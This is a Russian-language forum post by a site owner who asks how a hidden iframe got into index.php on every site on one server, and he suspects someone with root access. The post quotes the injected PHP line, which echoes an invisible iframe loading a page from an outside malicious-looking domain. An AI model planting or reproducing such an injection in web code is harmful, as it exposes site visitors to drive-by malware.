Перейти к публикации

Нашёл iframe на всех сайтах, как его могли вставить?


Рекомендованные сообщения

Сегодня обнаружил срабатывание касперского на своих сайтах, посмотрил исходный код и в самом низу нашёл этот код:

echo '<div style="visibility:hidden"><iframe src="http://burgerclick.in/ar_zzz/index.php" width=100 height=10></iframe></div>';

Мне интересно как его могли вставить. Код я нашёл в index.php, но дело в том, что дата обновления этого файла на сервере стоит очень давняя, а я неделю назад копировал все файлы к себе на комп и тогда всё было чисто, а сейчас все сайты на сервере были с этим ифреймом, а дата обновления index.php могла стоять очень старая. Как можно изменить файл, чтоб дата осталась прежней?

Если у человека есть "рут" доступ к серверу, он видит фтп пароли к моим сайтам или нет? (извиняюсь за глупый вопрос, но я не программист).

Просто дело в том, что из командера пароли не могли увести, т.к. там пароли и на другой хостинг и, следовательно, ифрэйм был бы и там, но его там нету. Значит пароли украли как-то по другому. Естественно я никому пароли не давал.

В прошлом месяце бала такая же фигня и тоже только на этом сервере, я тогда поменял пароль к админке сервера и некоторые фтп пароли на сайты, но сейчас всё повторилось и пофиг, что я что-то там менял :(

Короче я ничего не могу придумать, кроме как если это делает тот человек, который имеет "рут" доступ к серверу, но я не могу от него отказаться, т.к. он мне так настроил нгинкс на сервере, что при любом изменении любых характеристик на сервере (даже смена фтп на каком-либо сайте) ложит сайты и чтоб этого избежать, мне в таких случаях нужно, чтоб он одновременно был в "рут" доступе и вносил там какие-то коррективы... короче не очень удобно...